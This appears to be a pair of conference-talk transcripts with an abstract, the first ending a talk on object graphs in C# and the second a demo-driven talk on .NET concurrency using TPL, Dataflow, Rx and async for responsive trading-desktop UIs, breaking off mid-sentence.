actually something that's possible. Right. All right. So if I were to do something like this, I haven't built a system exactly like this, but I've done lots of systems that uses this technique of building object, polymorphic object graphs like this, complete with specifications and everything. But if I ever had to build something that had persistence built in, I would probably decouple persistence from the implementation because I don't think it's, I don't think it looks very nice that data contract serializer thing. And I also had to put data member and data contract on the classes to actually enable that. But decoupling persistence from implementation is just more work, but it's definitely possible. The other thing I would want to do was to create my graphs as immutable graphs. So instead of mutating the, an existing graph, what you would do is to take a copy of an existing graph and mute, and copy that into a new graph, but along the way when you copy it, you slightly change something. You add a new node, remove a new node or whatever. So if you're interested in how that would look like, I do have a long-running, semi-long-running open source project called AutoFixature, and the kernel of AutoFixature actually works this way. So it has conditionals and it has, it is an immutable graph that you can sort of, you know, project into new versions of the same graph and so on. So this is actually something that works. And it's really, really great for dealing with very, very complex rules systems. All right. So in summary, if you have one of those transaction scripts, extract an interface from your entry point method, that was that method called produce offer in this case, but extract an interface from that entry point method and then create all your nodes to implement that specific interface, including those general purpose building blocks like your composite and your conditionals and whatever else you need, and then you can just go ahead and party on the graph and do all of those fancy full things that I just showed you that you can do. So that's pretty much it. I have two and a half minutes left, so I don't have much time for questions. But do stick around if you have questions now and otherwise I'll be at the conference for the next couple of days if you have specific questions and just come by and stop me. I also have a talk on Friday called Big Object Graphs Up Front, which is just an hour of, you know, re-velling in how great and fun it is to create big object graphs. So a very, very geeky talk there. I'm also the author of a book called dependency injection in.let, which is kind of related to this when it really, when you really boil it down. So the code is, the code for this is actually available on GitHub. It's on github.com slash plur slash loan. So you can go and look at it if you think that's interesting. Otherwise, I have all my contact information there. So if you have a question and you don't get to ask that question off me here at the conference, then you can try to contact me in this way. I actually do have one and a half minutes left. So I will take one or two questions depending on how long time it takes to answer them if you have any. So any questions? You are just ready to go home and, yes, there is one question. How do you manipulate the mutable graph in detail about using something else? Or they call not projections lenses? So a lens is just a way to make a functional program more, more readable. If I do a mutable or an immutable, immutable graph. So I'm, I'm still looking for a very elegant way of doing that. But if you look at the auto-fix the code base, you will see some, some semi, in elegant ways of doing that. But it's basically something that involves lots of recursion. So very, very functional actually. So, and I think it's actually tail recursive, even though that doesn't really matter anything in C sharp. But I just thought that it could be fun to do that. Yeah. But it's not, it, it has something to do with calling an extension method and passing in some, some, you know, humtus into that one. So it's, it could be nice. And I think you could probably express it in a nicer way in F sharp, if you would do that. But it's possible. I hope that answers your question. All right. Okay. So I think that's about it. So if you have any other questions, then come and ask me afterwards. But I would thank you for coming and I hope you have a nice evening. Thank you.
|
Some languages (most notably LISPs) exhibit a characteristic called Homoiconicity, which means that code is data and data is code. This makes a language very powerful because a program can inspect and manipulate itself. C# isn't a homoiconic language, but using formalized object graphs, it's often possible to formulate a problem in such a way that the program opens itself up for inspection and manipulation - essentially faking Homoiconicity in parts of the code base. This opens up many powerful options, including easier unit testing, self-documenting systems, run-time changes to program structure, and more.
|
10.5446/51474 (DOI)
|
So anyway, my name is Michael Hyatt. I'm glad to be here and that everyone showed up for my talk here. I work for SunGuard Consulting Services. There's global services up there. We changed our name again on June 1st back to Consulting Services. And what I want to talk about today is a number of different things that I've been doing with a lot of the frameworks for concurrency and parallel programming.net. So this first opening slide here has got a little bit of the intro to some of the things we're going to look at, but I'll give a little more detail here. So I'm going to run, I'm not doing this full screen because of all things, it turns out that you can't swipe between a PowerPoint presentation and another desktop with Mountain Lion. But I got the new one, Mavericks, yesterday, but was tempted to install it, but it said virtual machines don't run on it yet. So I was like, eh, I can't do that. So anyway, what I do for SunGuard is I run a Capital Markets Advanced Technology User Experience group out of New York City. So I do a lot of work with a lot of investment banks, sitting on trading desks, working, building responsive trading applications for traders in these environments. What I have today is a lot of the stuff that I've built over the years, I've kind of been consolidating into some presentations and kind of giving these and revising it. And to be honest, this one turned out to be completely rewritten from when I gave it three weeks ago at another users group. So we'll see how it goes, but it does a lot more than what we were doing before. But I build trading desktops for these banks. I also do a lot of stuff with seamless applications and natural user interfaces and different types of things. But Daily Bread and other kinds that get around to building these desktops that can support a lot of transactions coming in and updating the screen very frequently. And this involves over the years, a lot of nice things have been added to.NET to help you out with these problems. So what I'm specifically going to talk about are the concepts of concurrency and responsive user interface in.NET. Various combinations of Task Parallel Library, Dataflow, Rx, and Async await. I don't think I'm going to try not to drive too much into the theory of any of these. It's not a how did we implement this in the framework kind of talk, which it was a couple of weeks ago. And then everybody gets mad at me, well, we didn't really get to some good stuff. So this is primarily going to be demo driven, some slides, some talks about how some of the stuff works, but shows you how you can use these different things to get things done in your application. And there's some patterns for each of these. So I was talking about patterns and various capabilities, but we'll look at some of these common patterns for each library and how each library supports concurrency and responsiveness in your applications. There's also one question I always got over the years too is Dataflow versus Rx, where do you use one or the other? Well, I finally figured that out like two weeks ago. It's kind of part of the getting the presentation retool because it changed the way I thought about everything, which is kind of nice when you have an epiphany like that. And I'll show you this and then anything else that you want to talk about through this. So this is why I was kind of asked like, who's done much programming with task parallel library? Can you raise hands? Okay, it's a few people, not a lot, which surprised me because this stuff is so neat, especially if you're a guy trying to do threads over the years and years and years trying to deal with this. It's a small amount, so I'll cover some of the concepts in task parallel library to show how this works because these things build up on each other. Anybody use Dataflow? Good. That's kind of the bread and butter of what I do and a big part of this demonstration. The end demonstration is mostly Rx and Dataflow that we'll be looking at. Reactive extensions. Okay. Those who raise your hand, have you used it for anything other than tracking the mouse and stuff like that? Okay. It's a one that I could tell. It's got some really kind of neat things in it that can help you out with these types of apps. Let's see, what else is there? ASync await. Anybody programming regularly using that? I've seen that because it's a what? I always get confused if it's.NET 4.5 or C-Sharp 5. I can't use it where I'm working right now and in investment bank because we just went to.NET 4, so I can't use that. I can't use finding out the limitations of TPL. I've been doing 4.5 programming for a long time. These are the just of the things that you'll use in a concurrency toolkit. These are the things that are built into the framework. There are millions of, not millions, but shot over the last couple of weeks to see how many new get extensions there are for every one of these libraries that you can go and get and help yourself out with. The Task Parallel Library, I've got some bullets here. It abstracts units of work for concurrency. I like to think in that unit of work type of model because I'll get a little more depth on this, but it provides you basic flow of data through your application. A lot of times when you're building applications and you want to do something in the background, it's implicit to think it's done in the background. I'm just going to put it on a UI. Well, a lot of times you want to take it from a background task to another background task to another background task, do a whole bunch of different things, and then put it up on the UI. It starts to give you this type of capability, which threads do not. So it uses the concepts of promises and continuations, and I guess the dotnet world called futures. Promises kind of JavaScript world. Who's familiar with promises? Okay. We'll talk about that. Because to me, tasks are just promises. So async await turned out to be compiler-based support for some of the semantics in TPL. You can go to Lucien's talks and he'll give you gory details on state machines and all kinds of different things on how async await works, and it does a lot of different things. But there are some of it in some of my examples. We'll see how it comes in. Go gets into agent-based programming, where you start thinking of your system in terms of messages, and then pieces of code that the messages can be routed to. Each message contains data, and then they get routed to these agents that you can say, you know, run this function on this data, run it on this many threads, you know, and then when you're done, maybe pass it down to another agent, send it to another agent. And this is the ultimate way, if you ask me, get concurrency in your.NET applications, whether it's a UI or server-side and stuff like that. It just makes a lot of things very easy. The reactive extensions started out years ago with, you know, being an implementation of the observable pattern in the.NET framework. So basically what our XNs of doing is, you know, you can take any I enumerable, make an I observable, and then from that, as new events come into the I enumerable, you can call a function to have code executed on it. And that's the very, very basic part of that Rx world. There's a lot to it. I'll show you some practical things in the context of, you know, getting to use it. Parallel extensions. Those have been around for a while, you know, parallel for, parallel link. We've done parallel link work. A couple. Yeah, it's pretty neat. They're not going to focus a lot on that in this talk, but, you know, we'll see it in some demos. It's great for paralyzing for loops. And there's some problems with parallel for loops and stuff with synchronization and pulling data back in order, which provides a nice construct for. We're not going to get into it. It was in here. So. And I'm going to be honest. I like to summarize all this. All this tech that's in there, it's just a means to an end. The user's experience with the application. Okay. How responsive is the application? Does the application get data to the screen for the user to see in the time that it's needed? You know, I only see these metrics that, like, you know, these trading desktops needs to support thousands of messages per second being put up on the screen. Okay. For the trader to be able to tell. I've never seen it that fast. And two, no human can process the information that fast anyway. So. But is it a challenge? Nice technical challenge to try to solve that problem? Yes. But there's some practical problems. Practical ways to solve it, which I'm going to show you the main demo stepping through all this is a practical way of using all this stuff to solve that and provide a good user interface. And it's keep the UI responsive. So. Let's go over. I'm going to start some demos here. The demos I have today are one that I show for the reference example, bad UI performance. Okay. Everybody's kind of seen one like this, but we're going to evolve and fix it through the program. Some brief demonstrations on TPL continuation, doing some task scheduling, what that's about. Data flow is going to end up being the bulk of this. MRX for generating events and doing buffering. And then the main demo is a simulated trading application that pulls all this together. So let's go over. Well, actually I have a flow chart here. Why don't we get that out? That applications, each one of these blocks is a set of piece of functionality that needs to happen in a trading application. If you ask me, kind of as a reference architecture. You know, you're going to have a lot of streams coming in that you have to capture all those. And then we're going to batch them together in the blocks instead of processing every one, every single event all the way to the screen every time. We'll capture them in the little blocks. Once we have blocks, we'll collapse the data and so it's conflation into just the changes that are needed. Then we'll flow it down the network to a distribution point where it's going to say, we're going to take those changes that came in from the market exchanges, let's say, send the data this way because we're going to go update the screen right away with that. A lot of times in these types of applications, I got data in from the market or back end systems. I now have to go look up some more data because they might be representative codes. I need to look up data if it's not in the system, bring it in. So there's other work to be done. But when that's done, you hop on over and you follow the path over here in Richmond, go down through flattening that all back out, then rebunching up for user interface aggregation for buffering to the display and then getting up onto a WPF or Win8 sample application, which I've got a Win8 sample on this. So let's look at my tryout of bad trading desktop. It's not really a trading desktop. It's just a program that I've run. I wrote over the last month to try to demonstrate different ways of going and working with performance in your UI. And this actually does not do any threads or concurrency. Just trying to figure out how to change what's on the display effectively with your XAML. So this has 1,000 squares pretending to be cells on a grid. In theory, we think of this maybe as securities and then the attributes, price, all this kind of stuff. So this grid over here then has different ways of running this demo. The typical one, what this demo goes, it's going to generate, I forget how many numbers of thousands of, actually, it's going to loop 100 times and change either the text or the color of the cell 100 times. And it's going to tell you how long it took to do it. And it provides an ability to do it neither using data binding or a more direct model that's changing like the color property on the brush that's in the UI element without data binding, which is a preferred way, whether you want to change the text and color. So there's all kinds of different things. But let's just say we're going to go change every one of these thousand cells, the text and color using data binding on a high priority background thread. You can probably guess what's going to happen with this. It looks like nothing's happening as I hover over the other buttons. You don't see it highlighting or anything like that. Then you wait around for seven seconds and it went to 99. You didn't see this display, it told the display to show 0, 1, 2, 3, 4, and every one of those cells but just jumped right to the end. Well that wasn't a very satisfactory thing to do. So if we change this around a little bit, and I've been needing to refresh this here, and let's go down and change the text and color, but let's remove data binding and see how long this takes. And I'm going to use a normal priority thread. So you can see that now this is going in and a lot better experience kind of going through that. And while that's running, the other buttons highlight, you can move the window around and different things like that instead of being completely blocked. So this is kind of the end state of that application is let's not use data binding. You see here, this took three seconds and it's technically a lot faster than that at least compared to the data binding. I've seen the data binding on this take like 17 seconds or something like that but this stuff usually runs pretty fast. That's generally one of the problems. I've walked in the clients where I've been asked to redesign their trading grid because it takes eight minutes to start with no responsiveness in the UI. Those are just sitting there binding things for 20,000 rows and not paying any attention to what's going on. So get rid of the binding, know how many things you're updating on the display, only change what you need to change on the screen. So that's kind of the first way is how not to do it. The last part's parted away in doing this. So let's go over to the next demo here. It's all parted as one application is a better trading desktop. This is actually running the code of the example that will walk through this entire time through this. And I'm going to start this and what this one's going to do, I forget to count, I think right now it's going to generate 5,000 events over five seconds and then update the display based upon what's coming in. One number for the value to sell and different colors depending on what's going on, which we'll see. So you see this is going pretty good. So this should come up, get them all done. Five seconds, I might have it on 10,000 or maybe we're getting the bug here again. So but it's updating pretty well. So let me, I noticed this due to that once last night. It's always, demo always gets you at some point. So let's start that again and it should stop in five seconds. But this is handling this pretty well. So and it's updating all these cells and to be honest, it's still more than any real person can try to try. I'm working with more different metaphors like with these desktops now like just show what the trader is currently tracking and only show them the updates on that and different you know niceties like that. So so just going through. So this is we're going to work to this because this is going slow right now. We're going to crank the speed up on this as we go through the talk. So I'm going to turn that off. Okay, is there anything, any questions please feel free to ask. So the TPL overview in a nutshell, okay. This to me are promises there basically it's work that's going to be done in the future. It may be on a thread, it may not be on a thread. It's going to be done in the background or in the foreground when you're not noticing it happening. They have results. That's what's kind of neat about it. That what makes it a promise. I'm going to go do something and at some point in the future, I'm going to have a result for you could be void, but usually a lot of most of the time usefully it's a piece of data. Okay, and that's returned through a result property and the tasks have state like waiting for activation running completed. If you tried to get a result from a task that isn't completed yet like through the result property it blocks until it's done. That's one of the semantic things you have to worry about when you're doing this. And one of the big tricks becomes, you know, especially with threads, but tasks make this very easy is once that works done, since you're doing it and I don't know when you're starting it, I don't know when you're done with it, how can you let me know that it's done so I can get the result? Well, you know, on threads you were like programming, you know, wait events or shared buffers, the signal or a callback and you got in all these kind of race conditions. Well, you know, you don't have to do that with tasks. Tasks have a continue with method. So you call a delegate when it's done. But in general the concepts, and we're going to jump into a TPL example here in a second, it makes us a lot simpler. Tasks represent the unit of work. They have continuations as I like to call them. It's fairly common, you know, continue with, continue when all different types of constructs around these, let you basically go and build compositions of work. Got to do this, when that's done do something else, when that's done do something else, and then when eventually it ever meets the final end, give me the result of all that. And keep me asynchronous and responding on the UI and all that kind of stuff while doing it. There's schedulers which will look at that, which basically the tasks, any tasks created run on, always use a scheduler which basically defines the scheduling of those tasks relative to each other on a thread pool or whatever. And I have some examples of how to change that around. Synchronization context, you shall be familiar with the UI context. That's the big thing, get it back on the UI, but you may also want to keep it in some other context so there's full support for this. Cancellation, big topic, won't get into it too much in here, but it just ends up being, I've created 100 tasks, they're all out and running, now I need to stop them all because I'm shutting the app down. Well, how do I do that? Well, threads, it was a nightmare, right? So, task, you know, thread abort, set global flags, wait for things to finish, single that to finish, and you can do it real easy with this stuff. And then aggregate exceptions. Always was a problem. If I started 10 threads and three of them threw exceptions, how do I get that figured out? So, there's nice structure concepts in this for that. So, the TPL, what,.NET 4 and on, I don't know, maybe it was 3.5, I forget, I think it's just 4. It's in these namespaces. It's more declarative than threads, and to be honest, like, WinRT Windows 8 doesn't even have threads. Anybody done Windows 8 programming, Windows RT? Yeah, that was an experiment I was doing with putting this over to this Windows 8 app, and I tried to do a thread sleep at once, and it was like, there's no threads. Fairly, they don't even expose threads to you. You have to do everything through tasks. Okay? It's all different. But this is a good thing, to be honest. So, but it took me a couple minutes. I thought, well, how do I do that? Well, there's good content. And they can wrap a whole bunch of other things. But, and just as they provide concurrency, which can be like, if you've done an asynchronous programming model, IA sync result, the event-based programming model, you can actually convert those to tasks. Because the problem with those is they're not very orchestratable. So when, you know, like, I started, you know, async programming a lot with, you know, Silverlight, and every web service calls async, and you got to, well, I need to make that call when that call is done. I need to call another web service because I need to data out of that web service, the past of this web service. Next thing you know, you're like going insane with IA sync results and trying to handle errors. Well, you can just wrap those up nicely in a task, and just kind of orchestrate the stuff going together. And they have status, like I was saying, you know, waiting to run, running, completed. It's very important with all these libraries, TPL, async await, the unitesync await that much, but Dataflow and Rx to a lesser extent to understand the concept of completions. Anybody who worked with that concept, if you haven't done TPL, then you probably haven't really gotten into completions, but completions are in a way, construct building the tasks that are in a way, I guess, similar to like having a weight handle. And the, there's a flag in a task called completed, which basically says whether the task has run to completion yet. And you can use that completed variable to tell if you're done to wait, or to signal to move on and do some more work at the end. And like I said, it's not threads. I could be wrapping an EAP thing. The data came back. Well, the framework sets the completed state, so you can go and continue on with things. So, there's sync contexts. If you're familiar with synchronization contexts and using them directly, which is really the kind of the way to do this, that stuff is, you'll see that you use the word post a lot, synchronization context, post. If you're on a dispatcher UI that's actually putting something on a dispatcher, the data flow stuff completely uses post semantics. So, if you're used to that stuff, data flow will look a little familiar to you. There's different synchronization contexts. Primary one is dispatcher sync, the thread pool. So if you're running something in the thread pool, a task in the thread pool, you need to get something on the UI, you can just passing a variable to the dispatcher sync context, just go up and tell it and it'll run automatically on that. So, got task schedulers. They kind of define the quote unquote, air quotes, thread pool semantics. But basically, tasks in.NET right now by default go to the thread pool. If they're considered normal tasks, long running tasks are not in the thread pool. But you can write your own schedulers. The task scheduler in.NET puts them in the thread pool if they're normal tasks. But you can write your own. I wrote my own in one of these to show an example of mediation, which we'll look at. So, we're going to look at a couple of quick TPL examples here. The one I like to demonstrate is scatter gather, which is a common pattern like in a training app or doing other things. A lot of times your app starts up, I got to go get data from, say, Reuters, I got to get it from Bloomberg, from all these different sources. And then once that they're all in, do some more work. But in the meantime, I want to do some other stuff on the UI. So this is pretty straightforward with TPL to set up this type of contract versus doing multiple threads. So let's go over and bring up our GUI again here. And I'm going to go to scatter gather. And there's five different examples of this. So I'm going to show some code here real quick. Let me bring this up. So if everybody can read that code, okay, big enough? I think I thought so. This first example here, execute naive. This is creating two tasks. Task.delay creates a whole other task who doesn't start running until the time frame in milliseconds that you specify. So it's a neat way. It's kind of like thread.sleep, except it's not immediately sleeping that thread. It's starting another task which will not start for that amount of time. And then you can go do some things. So this puts them in array. I've got two tasks, task one, task two. One will not start for 2,500 milliseconds. The other one, 5,000. Then I use the task.waitall function, static function, passing in that array. So what this task.waitall does is it waits for the completed variable on each task in that array passed in to be true. And then it continues on work. So without writing all these auto reset events, I just did this very nicely right here. So if we go over to here, we'll run this. And I say this is naive because it's blocking. You'll see the button's not changing back until 5 seconds in, and we're done. That blocked. Because task.waitall, the thread coming through here executing this, this blocks that thread. So that's probably not something you want to really do. So there's a better example of this. This is the execute better function. And this is showing a little bit more. Same thing as before, two tasks, one running the same amount of times. But you can see now I added a continue with method on this. So when that starts after 2,500 milliseconds, this one, and completes, then call this function to run. So this is going to show task one completed, task two completed when you're done. But also, when we do task.whenall, whenall is different. We do previous one, we did waitall blocks. Whenall doesn't block. It says when all those get completed, then run another function. So run this code when it's blocked. So this is going to fall straight through. When this completes, we're going to get some output. And then when everything completes, we get some output. So if we do this, and task started, say to UI's responsive, 25, one second, come on. Oh, sorry, I ran the wrong one again. Sorry, wrong button. Task one completed. Three tasks completed. Everything's all completed. So, and we remain responsible with it. So by not using blocking constructs, using continue withs and such, we kept everything kind of going nicely in the application. So, yeah. Definitional task, is it in a TPL library or a make you a problem? Well, it used to be just TPL. It's now part of.NET, whether it's considered framework. I think it's more of an extension, but it's four on. It's in there for you to use. And what's cool with this stuff, maybe you see a little bit of, I got to watch time, but you can create your own tasks and just wrap another piece of code. And if you want to include code, don't orchestrate it in with continuous. You can use these constructs called task completion sources, which say, hey, just create one of these and then you can say set result, which then when you set that properly, it sets the completed flag. So, it could just be old code legacy code that you wrapped with the task real easily, that then you can now orchestrate through other tasks. The input and output, which is really neat. So, what I'm saying, it's like, tasks don't mean threats. They most usually mean that, but they can be almost any piece of code that you write that you want to involve in, you know, it's running in the future or in the background and I need a result and I need to do something with the result or I need to know when it's done. And you just go use these constructs then instead of, you know, all this low level threading stuff. So, I'm going to look at one last example here because this is one here. This I'm using the scheduler. So, this execute with timeout. This is kind of doing the same things except I'm just playing with the same thing. Playing with the scheduler here doesn't really do much in the demo to be honest. So, doing the same thing, but what I'm going to do here is, because one of the things here you might want to do is go out, get something, try to get it from a couple places and then, but the first one that comes in, the first result I get, that's fine. I don't care about the other ones, but I need to go and, you know, if a certain amount of time expires, let's stop looking for things and go do something else. So, like in the one before we had the tasks array here, which did those two tasks. I made another array where I took a when all of those, but also put in a task delay of the timeout. So, I forget what I passed in here. It's a few seconds and what it will do then because right here I'm doing task when any, it's on this array, the time tasks, when either of those completes. So, either when all of those other ones going out and getting stuff complete or the timeout one completes, do some code. So what we'll see here is this will go and run. Okay, task one completed, timeout, status waiting for task two completed. This should be scrolling, but it's not, task two completed and, you know, unfortunately that's not showing everything. It's coming up in. Showing that what's going on here when it came up is when we got through that timeout and got through here, we could check the is completed flag on any task and say, if it's completed on the first one in this array, then it was a timeout. So this one was then showing that, hey, task one is still running or maybe it's shut down, task two was still running. You might want to go and terminate those because you don't need them anymore. And it's a purpose of the next demo which was cancellations and be able to do that. But there's a lot of data flow stuff I want to get to. So if we have some time at the end, we'll come back to these. Let's go back over. Mediation. Okay. One more thing with the TPL. This shows using schedule. This is a pattern which basically you create an object that decides, you know, what's like a priority on actions relative to other actions that you give to it. This uses a custom task scheduler. So let me bring this up here. Window. Didn't open that one ahead of time. So open it up quick. Mediator. This is using custom tasks. Okay. I've created two subclasses of tasks in this example. We have a, where is that one? Let's go to, we can see it in here. Periodic task. Right here. Here's one. These are very simple versions, subclasses of a task. You can subclass a task. A lot of ways you're expected to subclass a task. But what this can be passed in is some work to do, then a budget. And what this, what this task is saying is just having some extra value variables for a scheduler, extra properties for a scheduler to look at. I also have a sporadic task. Go to declaration. Looks very much like it. Almost exactly the same thing. But the way they're going to be handled is different. So periodic tasks. In this case, the mediator I wrote says, if there's any tasks in the queue to be executed that need to finish within the budget, basically in this case, 50 milliseconds, they should be executed before all the other ones. The sporadic tasks, well, whenever there isn't anybody else being processed, then we could do those. So in this case, this can be used to push through events off like a market exchange to the UI while superseding all the UI events, but still interweaving them to an extent to keep some efficiency. So this mediator comes through here. And he's using a custom task at its own type of thing. So when we come in here, we'll see the demo here. Mediation. Mediator. I have two simple examples in here. I'm doing an observable and generating a range of numbers. This is actually our X, the observable thing here saying generate 50 numbers starting at zero. And I'm going to subscribe to it. And every one of those that comes through, I'm going to say, hey, mediator, I want to schedule this piece of data on you to handle. And this mediator does some fancy things like look up what methods in the applique. It's like kind of like a PubSub bus in the app for anything you pass to it. But it says here, for anything that are periodic, run this method. Anything that's sporadic, run this method. So when we go and run this, we'll see here, let's go to Mediation and do the dispatcher only, which is that one. We see you get this sequence of zero, one, two, three, through 50 all the way through it. This threw in zero to 50. And we put it on the mediator. We said do all the work on the UI context. And so what happens with this is the broadcast function looks up the target by topic and sees that it's a sporadic and goes into schedule on the task scheduler, the sporadic. And you see here, we create a sporadic task, pass in what we want to invoke the budget properties. And then we say that tasks start. And you can pass in a scheduler or any task. Typical way to start a task in.NET is task.factory.start new. But you can create a new task, then you can give in any scheduler. So the scheduler has actually passed a task. You can put it in a queue, start its execution whenever you want, compare it to other tasks, and figure out who goes next and do all your own kind of work with that. Because what happens with this one, then, if I come back over and look at this example here, and we're going to see in the view model here, the second example here is I'm doing just through 25 right now because I'm going to do two. I'm going to broadcast such that we want to go run a periodic task and a sporadic task. And we're going to see what happens when that runs because what goes on here is when I run this, doing it all their needing priority, we see we get all the odds come first. Because what happened with this is that first statement in there took the odd number, scheduled it to run on a periodic task, which is scheduled and executed by the task scheduler sooner than the other ones. So all the odds pop out first, and all the evens pop out second. So we can control that with just creating a task scheduler. If you look around a lot, you'll see concepts of pipelines. Anybody familiar with pipelines in TPL? You come across this. Okay, one. Okay, it comes across its basic data flow. There's some good documentation shows you how to do it, but I found this quote by Steven Tobe the other day said, don't do those, use data flow. So guess what? The next topic is data flow. That's where stuff gets really fun. So data flow is data oriented. It's message oriented. You think of data that has to be processing your app and scheduling code to run against the data. There's some very elegant problems that can be solved with this very easily, which I'll show a few. It's similar to message passing after base programming. It's got contracts for passing flow, data message between blocks, handling order, doing search and all kinds of, I'm sorry, changing path based upon the value of the data in the network. It's very similar to continue with TPL, except it's a lot more powerful. Continue with has a problem. When you say this task, continue with another task, you're only going to go to that task. And you can't say when you're done this, spread the data that's coming through that first task across eight different versions of this continue with the load balance to work. So tasks really form pipelines. Like you see, it's like from here to here to here to here to here. And you get this straight through construct that pretty much is one task, one task, one task, one task all the way through the thing, unless you write task orders to try to handle this stuff separately. Data flow breaks through all that. I have some slides on what's involved with this. But basically, the concept is you work with blocks. And I data, if they're all implement I data flow block, you get source blocks, target blocks, and propagator blocks. So you want to put data in a data flow network to be processed. You post it to a source block. A source block can pass data to a target block, another block. A propagator block can receive and send data. It's just emerging in these things. But there's some building implementations of this, which I'll show a couple of these. The buffer block doesn't do much of anything except queues up data and sends it downstream when it feels it's convenient. So it's a way of building a thread safe queue of data for processing. That's basically what this does. A write once block will only execute once, ensuring that this piece of data only gets processed once in a multi-threaded environment. So a broadcast block, the data you send in there, everything that's connected to it, send it to every one of them. So you can fan the data out evenly. Well, the same piece, one piece of data to everything. Then there's execution blocks. These only, these with these, you basically, you can assign code to it. So you put a piece of data in, and you say, run this function on it. And in the case of an action block, that's all it does. Receive the piece of data, run the code. A transform block receives a piece of data, you run code, it expects a result, return from it. So you return something new, you transform the data, pass it down the network. Then you have transform many, all kinds of things. There's stuff for joining. One problem is our data is coming from here, from here. How do I, when I get one from here, I want to put them together and send it down. You can do it automatically with these join blocks. There's batch join blocks and join blocks and all kinds of different things. So I think usually the best way to demonstrate this is just to, I mean, explain data flows to just show it running. So we're going to go over, I have a number of demos built up here. Okay. So let's bring up data flow and look at some of these examples. Okay. The basic construct is action blocks. So the first demo is, we're going to create an action block. So you say new action block, the type of the data you want to process with it. Just using integers, it can be any type. And then you give it a lambda function that says, oh. Okay. Get that about 40 times a day. Usually an examile designer, but not that. So here's something new. And what this static function I have here just writes the task ID and the value of the data out so you can see this in operation. Then on the action block, you can say post. I'm going to post an integer of one, two, and three into this. And we'll watch it run. So post three items, no waiting. So you can see some things going on here. I said I ran the action. I'm not using mediation. Ran action message via mediator, which they're just some diagnostic stuff. Then you'll see here, task ID 777, value one, two, three. That function that delegate I have in here basically then got scheduled to run on a task, was passed all those pieces of data one by one in sequence, and it generated the output. Action blocks have semantics such that they have a queue that can accept as many items as they want. But by default, they will only ever create one task to execute the data at any time. So that's why we see here, task ID 777. This only allocated one task. So it's guaranteed that the order that you post in, you get the order through there, and it's going to be run through one task. So there's not really any real concurrency in here except that it's run in the background. So I'm going to skip on this one. There's different ways of telling when work's done in Dataflow, which I got to watch the time because of this. But basically, there's an input count, how many things are in an action block's in queue. Then we're getting back to completions here. You can see this is same action block, posting 20 items in, just using a thing to generate it now. But I'm going to say action block.complete. They kind of have a completion status like a task. So if you want to wait, if you throw a bunch of items in an action block to be processed, and they take a while, which I'll show, and you want to know when all the items are done, you can set a complete flag and then wait for that to be completed or do a continue with on this function to do some more work when it's done. So we'll see this one. This is actually kind of bad because this comes in and blocks. And it's running through and see we're still doing more and it's still on one task. But you see this message came out at the end here. That's actually higher up. It's in the calling function of this. But because I waited here, we really kind of blocked there until all these messages came out on the main thread. So the trick is, okay, I want to start getting a little more concurrent with this. This is the same as like the first example. An action block, passing in the delegate. But every one of these blocks always has these data flow block options. This is an execution block. So in this one, I'm going to say max degree of parallelism equals two. By default, it's one. So when we run this, when this is run, and I run it, you can see now task ID 910, 999, 910, blah, blah. It's now created two more tasks. They're actually on different threads. And the data you can see nicely is actually being processed still in order, 0, 1, 2, 3. But it's being run across multiple tasks. And all I had to do with that is change max degree of parallelism. So we can probably bump this up. Let's say we, you know, then I got to recompile and stuff. So I don't want to break any demos. But you can bump this up, the limit is as high as max value. Whether that does you any good, I don't know. There's other constructs in here. Like if you look at the options that are in here, you have max messages per task, bounded capacity. Like I said, this block has a queue of items. You can pass an action block and hold any amount of items, but only apply max degree of parallelism instances of that delegate against those messages at one time. Well, I can say now I only want to have a max of 100 incoming messages. So in a way, action block, if you look at it, you can start implementing like disruptor pattern if you're familiar with that with like bounded input queues, rounded queues going through this, controlling how much is coming in and how many things are working on one thing at one time. In any of these, you can also do task scheduler. I can run this on any task scheduler. I could say run this block just on the UI thread. Maybe I don't want to really do that most of the time. By default, they're like thread pool. But if there's a block down near the end of the data flow, what I want to do is run that one on the UI thread because it's going to update the screen. So I can run it all on the background until I just get it last block and say, hey, boom, up on the screen. So let's jump ahead and look at some of that stuff because that's starting to get into buffer blocks. So when you bring up buffer blocks, and it's probably the only other block I'll show here today for time constraints. So I really want to get into that next demo in some more acts. So the buffer block, buffers really all they do is they're just a queue to hold things. You don't even give them a delegate to execute anything. So you can see here, I'm creating a buffer block. I'm creating an action block that's just kind of just the same thing before. They're going to generate 10 items. But you see here a trick here is I'm saying buffer block link to action block. So the buffer block, you'll post things into the buffer block. The buffer block will receive them, queue them, and then it does a two-phase handshake with the action block because of that link to the pass items to it downstream. And so this one will do. It'll be very much exactly the same kind of as the first example running here. But we can start doing more advanced things with it. So I just do that. Boom. It's actually kind of the same as the action block one because it kind of is in a way. But then if you want to get a little more complicated, you can see here, I've said here on the action block now, let's go to two degrees of parallelism on the action block. There's still one buffer block linking downstream. When I run this one, you can see now basic two degree, task ID 12, and I'm only writing the values out on one. So that's good. So let's now, here's where we can get fancy with this. The, I'm now creating the buffer block with two action blocks. First one is going to write out what data it gets and whatever. Then on the buffer block here, I'm doing a link to both of those blocks. But I can say, hey, if the value being passed through is odd, go to the first action block. If it's even go to the other action block. So I'm doing basically content-based routing through this. So as the data is coming through, I'm making a decision on where to go through the blocks in the data network. So if we run this one, odd even, you'll see now that block two, it's zero, two, four, now block one gets all the even because of that distribution pattern. And then there's some other things I won't look at here right now because it gets in detail. But basically, the action block has that queue waiting for it. They run in greedy. So if that buffer block has 100 items and it goes to that block and it says, I've got 100 items, can you have it? I can take any amount, you give me, you give all 100 to that one item, that one action block. If you cut it down to max size of one on the action block, it'll say, I've got 100. The action block can say, I'll take one, okay, I'll give you one. Then I'll go to the next action block, denim link two, try to pass it to the next guy so it can start rotating and round robbing, load distributing work that way by a simple concept like that. Broadcast blocks, we'll see this in another example because we're running low on time, but basically fans everything out to everybody. So RX, and then we jump into the other demo. It's a big topic. I've been trying to get my head around RX for about three or four years, but basically it sets up an observer pattern where you can start, instead of iterating through things like enumerable, like doing four each and being active on every item in the group. RX sets up with the observable. Here's a function for you to call anytime some new data appears in the stream, which is to prime everything. But it also gives you a lot of capability for working with the data in those streams that delegate you give it. Should I run that on the UI? Should I run it on a background thread or different types of things like that? And mostly what you do with it is you convert some link queries to observables and then start processing those. But it's almost an endless amount of things that you can do with this. So let's go. We're going to have two demos over here, a pure RX. Okay. Let's go over to... RX examples, few model. I don't have it open right there. Oh! RX examples, few model. Okay. The first function here does a periodic generation of items, which I use it in the other demo. So I wanted to show it here by itself. But you can say...you create a, you know, a declare an observable. It's a class with a lot of static methods. And you could say dot interval. So on an interval that you specify here, every 200, every quarter of a second, start generating a sequence, which is basically...this is every 250 milliseconds, 